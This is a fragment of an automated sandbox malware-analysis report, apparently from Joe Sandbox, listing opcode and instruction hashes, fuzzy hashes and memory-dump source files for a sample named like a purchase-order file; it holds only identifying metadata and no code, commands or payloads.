                                                          • Opcode ID: d4e16e3c3f4618351f1ea73794273fe04e3137d8308dc1d09ea534f20757b433
                                                          • Instruction ID: a1a6b957ee15f2756d89fd69c7068e5a3d5aefcdd921c357583b0431b7a52849
                                                          • Opcode Fuzzy Hash: d4e16e3c3f4618351f1ea73794273fe04e3137d8308dc1d09ea534f20757b433
                                                          • Instruction Fuzzy Hash: EC018836350315AFDB049E59EC84F9A7BADFB89721F104066FA14DB290CAB1D8008750
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f920d3c003b6a038628656228afbe8c6a4436d03a187aa638ab1ea30814d84a3
                                                          • Instruction ID: 02ecf0aa11be76cdd0df14d90ca764c7ce919600bff825d875c922f3e897eb22
                                                          • Opcode Fuzzy Hash: f920d3c003b6a038628656228afbe8c6a4436d03a187aa638ab1ea30814d84a3
                                                          • Instruction Fuzzy Hash: 31115E39A04248CFDB14DF98E480A9DF7B2FB84315F24C562D4059B70AC730E985CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed2df333c449f757f1e98990f978deb5c43bafb9f11d006008479485a63faa37
                                                          • Instruction ID: c2a16899b726a2917fec499fe4887268f0ff0f5122afbc90134dc0bb786eacbc
                                                          • Opcode Fuzzy Hash: ed2df333c449f757f1e98990f978deb5c43bafb9f11d006008479485a63faa37
                                                          • Instruction Fuzzy Hash: 6B118BB0D043089FCB45DFA9C5416BEBBF5EB89304F14C1AAD408E3205EB349A818B91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7aefadc4d50098c78486b239e7694aa19b5e6a22785e9e570386a8a22c69d0bd
                                                          • Instruction ID: da50372181332346e2daf3177fec41805cf02ca0f3c16235e509824310bfc866
                                                          • Opcode Fuzzy Hash: 7aefadc4d50098c78486b239e7694aa19b5e6a22785e9e570386a8a22c69d0bd
                                                          • Instruction Fuzzy Hash: 46212434A04319DFEB65DF58C898BE9B7B1FB49305F0091E5D0AAA3680DA745EC9CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b787b658f3f65761e05cf87f29d2eb97d9df928e800ac6999ec5ca4f432cdb2
                                                          • Instruction ID: fea09de07432a83fd35fe444f1dd2f3715c186b3688f30c9060d6755966fee8c
                                                          • Opcode Fuzzy Hash: 3b787b658f3f65761e05cf87f29d2eb97d9df928e800ac6999ec5ca4f432cdb2
                                                          • Instruction Fuzzy Hash: 76111C76E00208CFDB14DF99E4806DDF7F2EB88325F288176C105A3709D73599558F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02eca309007c142cfb42d04164e165cf8006d99fe4e1ef803688df7020302b82
                                                          • Instruction ID: a40088ac5a05d079030bcafe4c71a798fe32d79565a309550d8457b963fbc8c6
                                                          • Opcode Fuzzy Hash: 02eca309007c142cfb42d04164e165cf8006d99fe4e1ef803688df7020302b82
                                                          • Instruction Fuzzy Hash: 1801843A606740AFC721C765D886A8ABBB5EB41711F14C4DED489C7283DA3AF447CB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec024faa6bc745404fb125ba3caf1205756dc2b1181300ba071e19d266db918a
                                                          • Instruction ID: 04239e8baca09e95d8091f9e5bc98a0d6c42fd11a924e91cb949e6a544a3e87e
                                                          • Opcode Fuzzy Hash: ec024faa6bc745404fb125ba3caf1205756dc2b1181300ba071e19d266db918a
                                                          • Instruction Fuzzy Hash: 07015AB6B202108FC744AB7CD49995E37F69F9D25431544A9E10ACB3A2EE74DC068BA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07425601d75a6e0451ce4f074d6714dcf8a00f0474330c640d6edb67338441d5
                                                          • Instruction ID: 96516172c6214a36470d26c41e48c92e0a46fce4bc4f138ea1d5a6a8f1b3c026
                                                          • Opcode Fuzzy Hash: 07425601d75a6e0451ce4f074d6714dcf8a00f0474330c640d6edb67338441d5
                                                          • Instruction Fuzzy Hash: 21018631304740CFEB2567B09C257693B7AEBC5326F1584EDD5195B2D0DF66E801C692
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ca1d96ff66279db8c1061d0da6cdc902e3196b237f20c789fd9a0d7a76d1e47
                                                          • Instruction ID: 509a10fd30c566e6bab187a2bedee8deb57b58e5e181da99ddb47a9a34d66f17
                                                          • Opcode Fuzzy Hash: 1ca1d96ff66279db8c1061d0da6cdc902e3196b237f20c789fd9a0d7a76d1e47
                                                          • Instruction Fuzzy Hash: 0C115A70E04208CBDB08DF69D8447EEBBB6FB89350F00C0A5E449A7245CFB42988CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f23e5319478a1ce41b54c6ce3b6895e9732e8faca40849fb3e94f43bdbc4e1c
                                                          • Instruction ID: 1d04748d18717b02597e816f0c563ce830b4adea63c92efcc32c8cb31ba61fd8
                                                          • Opcode Fuzzy Hash: 8f23e5319478a1ce41b54c6ce3b6895e9732e8faca40849fb3e94f43bdbc4e1c
                                                          • Instruction Fuzzy Hash: 8021B774A042288FDB65DF24D848B9AB7F5FF49305F5050D9E44AA7291DB746E80CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74198c99a55ca3dc078a5b3795ecd78bb1600354515f73e3c225ddef76741211
                                                          • Instruction ID: 50b28cabe825875068c56ffb38401969042fb7b02c325ee03e5ea348933f7f91
                                                          • Opcode Fuzzy Hash: 74198c99a55ca3dc078a5b3795ecd78bb1600354515f73e3c225ddef76741211
                                                          • Instruction Fuzzy Hash: 16014871D04208DFCB05DFA8D8497BDBBF4FB08305F2488AAD809E3250DB759A41CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 771fc2de2936d72f75076f6426c4a609df42ad52fc465937e55ff9591fda1b01
                                                          • Instruction ID: 8c13e5bf371d0ebfe848dbb7258bac1918d7b3a7254b5e38bd0adcf8fe99f9c7
                                                          • Opcode Fuzzy Hash: 771fc2de2936d72f75076f6426c4a609df42ad52fc465937e55ff9591fda1b01
                                                          • Instruction Fuzzy Hash: C9019235700600CFDB19DB24C468B3A7BB6AFC9325F14859CD55A4B790CB79E842D781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 471ff3957e4dfb9ff3fc48d7b5d9f6255cb527f97d7c19f8cce20bcd76e88f66
                                                          • Instruction ID: 88c9856a8bc7592cf6c997927b19ba624186ecbc332b003116d307699f1a9459
                                                          • Opcode Fuzzy Hash: 471ff3957e4dfb9ff3fc48d7b5d9f6255cb527f97d7c19f8cce20bcd76e88f66
                                                          • Instruction Fuzzy Hash: B601B1317006008FCB28EB24C464A3E7BA7AFC9321F1485ACD55A4B790CB79EC42D781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32630d0b091f94aac0cee962f5a31ea17dd8b09dadc5cf3ac1a07ca4b9ac5ec3
                                                          • Instruction ID: 6cacd29e6cff2f23525dd0262ced57980de329a22ed2c90ccab8ad263dae5220
                                                          • Opcode Fuzzy Hash: 32630d0b091f94aac0cee962f5a31ea17dd8b09dadc5cf3ac1a07ca4b9ac5ec3
                                                          • Instruction Fuzzy Hash: 3F018F367006149FC7089B24E458A2EBBA2EFC8711B108169E90A8B394CF35EC42CBC5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c93dbf686db565b223018da12f71905792640f12b634d8b0a8611d67629d11f5
                                                          • Instruction ID: 49e7555bb07e4013d2527b7215a4588aea90ab8e6114e6a3c4554f4c0a7c53d6
                                                          • Opcode Fuzzy Hash: c93dbf686db565b223018da12f71905792640f12b634d8b0a8611d67629d11f5
                                                          • Instruction Fuzzy Hash: 40018F70905208DBCB51DBB8D0487ADBBF5EB44210F1086EAD848A7351D7799E41DF92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5df042690b18ac74f07c6a4bbca81288d4bdf3f0edd32368cff82b20a517a614
                                                          • Instruction ID: bc14f333dff5100731bec56c8da3dc31dd7698522fb1ef730a2c37d973b178fc
                                                          • Opcode Fuzzy Hash: 5df042690b18ac74f07c6a4bbca81288d4bdf3f0edd32368cff82b20a517a614
                                                          • Instruction Fuzzy Hash: 8301F9353046418FC7049F59EC84E9A7BB9FFDA32171580A6F514D73A1CE20DC05C791
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fd60c040dcc609434f213302c588d33e133fceb0a931b7fcc8d638f119b5505
                                                          • Instruction ID: cb8e3d73f83b8b43e1b78d360e5a9e6001ddb9d3a8d72eaacf88738da4a62036
                                                          • Opcode Fuzzy Hash: 2fd60c040dcc609434f213302c588d33e133fceb0a931b7fcc8d638f119b5505
                                                          • Instruction Fuzzy Hash: 4501FBB5B102108FCB44BB7DD85895D3BF6AFCC66131904A4E60ACB371DF64DC059B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e96a843630ea2c7daf8b8391b80598c2f6f525a66a713e277f0ced20858eea69
                                                          • Instruction ID: bf9c1c8fe02b075fd29776119d7aa345c75d8ab4d6e1f33ff0adaddf4d29e9b4
                                                          • Opcode Fuzzy Hash: e96a843630ea2c7daf8b8391b80598c2f6f525a66a713e277f0ced20858eea69
                                                          • Instruction Fuzzy Hash: 5001083AF00248CFDB18DF99E4806DCB7B2EB88325F28C166C515A3309D73199558B20
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3822aaa08e0a202b93760892c612da6c652e484f7abadf7b8a4325e6e7df276
                                                          • Instruction ID: 02928f51f3c5fb9f16ea61ab3bda2a01ebb085bf9bb7e09a8bcd693d3fc34406
                                                          • Opcode Fuzzy Hash: e3822aaa08e0a202b93760892c612da6c652e484f7abadf7b8a4325e6e7df276
                                                          • Instruction Fuzzy Hash: AE01E53AB04208CBDB08DF99E4806DDF7F2FB88325F288166C509A3619D73599558B60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0b7eb0e7e9856fc324cdf8002800b7a108e1053e015b851c0ac730681d51d04
                                                          • Instruction ID: dbc824d1cb7f6f705422991f92a850bc4f0672981e6f0f21ca51becb975b1d1d
                                                          • Opcode Fuzzy Hash: f0b7eb0e7e9856fc324cdf8002800b7a108e1053e015b851c0ac730681d51d04
                                                          • Instruction Fuzzy Hash: FD0181B5B142505FCB44AB7C941895E3BE69FC925131904AAE50ADB3A2DF34CC0687A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e05b37690f478fd2158e924af187de546140800600a8e431b9b3d06efeb3a518
                                                          • Instruction ID: ad85107efde2eabf8a45be512d290e26c165fe51fdbb8b5984e6e881764d4b51
                                                          • Opcode Fuzzy Hash: e05b37690f478fd2158e924af187de546140800600a8e431b9b3d06efeb3a518
                                                          • Instruction Fuzzy Hash: D5F0E9FB40A3C05FE7160370ED527E87F219B53302F4D8097D54085353D62D4416C362
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c326e198ffa5a2e86727f26ce33d4b8466ef646d6e3f04ea8e0e497e74989ead
                                                          • Instruction ID: 14c84b1d5f47de906029cd3bb2031b6dda5ebf105d61ba3d39ae46f6d5c8b150
                                                          • Opcode Fuzzy Hash: c326e198ffa5a2e86727f26ce33d4b8466ef646d6e3f04ea8e0e497e74989ead
                                                          • Instruction Fuzzy Hash: 05016D7AF00608CFDB04EFA9F48069DB7B2EB88325F24C176D109D7369DB3099558B11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 241ff30c5ed2814c98c169dfa46d6eeece2bf7577c5710394c911b1dee7cc5ef
                                                          • Instruction ID: 04c02311217959d5a74e40aa2e59a10f5399981989219dfeef8e1d353066afed
                                                          • Opcode Fuzzy Hash: 241ff30c5ed2814c98c169dfa46d6eeece2bf7577c5710394c911b1dee7cc5ef
                                                          • Instruction Fuzzy Hash: EB01283AF04648CFDB14DFA9F480AEDB3B2FB88315F24C026D408A3609D734A9569F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d320f942e43fbc519dc3dbc052e9ff252d738677c2514a8adf9a38670da6acd
                                                          • Instruction ID: 4395b2dc06d746fb020f744fa877f2cd60579dd9304a0b941aad455834caa939
                                                          • Opcode Fuzzy Hash: 9d320f942e43fbc519dc3dbc052e9ff252d738677c2514a8adf9a38670da6acd
                                                          • Instruction Fuzzy Hash: DB01163AE04108CFDB14DF98F484A9DF7B2EB84325F28C166D518A721ADB34A956CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fcb14845caeaa14fba19a4267fd0acf722b7012935ff30925ba3f51127efdf9
                                                          • Instruction ID: e296bffed39f09a00cceadf5236b56fe641c43c3d734f356521b38d43811d98a
                                                          • Opcode Fuzzy Hash: 2fcb14845caeaa14fba19a4267fd0acf722b7012935ff30925ba3f51127efdf9
                                                          • Instruction Fuzzy Hash: 1C0131B66042099FD718CEA8D444FAAFBF5FB44370F5480A9E945DB250D731A980CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 275bea255a07d6388b4786c9307da54e39fc8f9fa221d2e2511a5f96d3062a2e
                                                          • Instruction ID: bf889c647279caff68b2ee517253d75a11e1384ceca70f1227bc2bea807a3417
                                                          • Opcode Fuzzy Hash: 275bea255a07d6388b4786c9307da54e39fc8f9fa221d2e2511a5f96d3062a2e
                                                          • Instruction Fuzzy Hash: A201AF353006149FC709DB24E05892EBBA2EFCD721B208169E90A8B794CF75FC42CBC5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4393106e49cb2449552db4d7249d9b4ecfa7e7d09929232b6ab0c99574f85ec3
                                                          • Instruction ID: a3c90904d9650097728317755310ee26c94f5475df7422ed820ac3c41d8b428d
                                                          • Opcode Fuzzy Hash: 4393106e49cb2449552db4d7249d9b4ecfa7e7d09929232b6ab0c99574f85ec3
                                                          • Instruction Fuzzy Hash: 7EF04CB2F083515FD7098618581072EBBB4EFC9720F1481A6D905EB3A1DB71BC018390
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21f1050f315271354d7521e67e6d2613302f6060e6f2cd749ab558fd914f28d8
                                                          • Instruction ID: ce44f0ac46b3135953f0e61e6faa2b1baab7930ea2c6133ef0fa7748f1fb2ba6
                                                          • Opcode Fuzzy Hash: 21f1050f315271354d7521e67e6d2613302f6060e6f2cd749ab558fd914f28d8
                                                          • Instruction Fuzzy Hash: F8F02BA2F0D2904FE31A422868513296FA1DBC6625F1845EAD6429F2E2DB96B802C350
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 621507d058d02ae1b913be10b9c89d66ec14e17b14cfc9532ad482abc6079cb8
                                                          • Instruction ID: aac96d436dd29f801b222a94bf5c84f7173fd509678553fccf5b6c993c6d18fb
                                                          • Opcode Fuzzy Hash: 621507d058d02ae1b913be10b9c89d66ec14e17b14cfc9532ad482abc6079cb8
                                                          • Instruction Fuzzy Hash: 0C013136A08684CFDB15DF68F8806E8B7B2FF86316F28C1A6C1459721AD7305555DF21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 888a13efbda0b75d471d1d2aae2c6621871a4b6705bb4b91cd17da2805ea2c4b
                                                          • Instruction ID: 1c92128ff07e88e845a741b395f240a175c04de2d8a1934f263e7c7bfb27c9c3
                                                          • Opcode Fuzzy Hash: 888a13efbda0b75d471d1d2aae2c6621871a4b6705bb4b91cd17da2805ea2c4b
                                                          • Instruction Fuzzy Hash: CD016D36A04248CFDB18DF98F4806DCB3B3FB84316F24C166C00597619D7359A56CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 351557547297764f493e6e7e8cf5e761e01697fb61870e9e376b7dbf8a6cde70
                                                          • Instruction ID: a93700fec3dbfd61b37e8e82832dbeca149f86788bece27314c99672245b9589
                                                          • Opcode Fuzzy Hash: 351557547297764f493e6e7e8cf5e761e01697fb61870e9e376b7dbf8a6cde70
                                                          • Instruction Fuzzy Hash: 8CF06DB5B102104FCB44BB7C941881E36EA9FCC66031400A9E60ADB362EF70DC0187A0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d57eff94bafb0fc98cbc3d673db9337373b9506c83f6cddced5c8a8230f2c9f8
                                                          • Instruction ID: 3b9f3c838459eac1320879d98c7afc7836257535dfe1863b6167d20b1a48be9d
                                                          • Opcode Fuzzy Hash: d57eff94bafb0fc98cbc3d673db9337373b9506c83f6cddced5c8a8230f2c9f8
                                                          • Instruction Fuzzy Hash: 4C01FB3AF04208CBDB04DFA9E8805DDF7F2EB88325F248176D509A3305D63159169F21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 106e8ec7a453636560102651ae75d23c2361100e05fd0c34d080257c03778822
                                                          • Instruction ID: f72b79d497bc9e43e4e1ab402b6e9f27d88e47386b3766471968e1f0dfe71965
                                                          • Opcode Fuzzy Hash: 106e8ec7a453636560102651ae75d23c2361100e05fd0c34d080257c03778822
                                                          • Instruction Fuzzy Hash: EE016D36A04248CFDB14DF99F4846ECB3B3EB84316F24C176D10997619D7359955CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cac3e9971880e04ee0725c4855978e6b115c6ee56ffb48532d8522649b0bcaef
                                                          • Instruction ID: ac645c46a6fcf3f89e093b91d2b42f42e420d238aa37ce70105c5870fb9fb2ff
                                                          • Opcode Fuzzy Hash: cac3e9971880e04ee0725c4855978e6b115c6ee56ffb48532d8522649b0bcaef
                                                          • Instruction Fuzzy Hash: EBF0BB71B042115FD7188619945072EB7A5EBC8B24F148569E905AB350CBB5BC418790
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
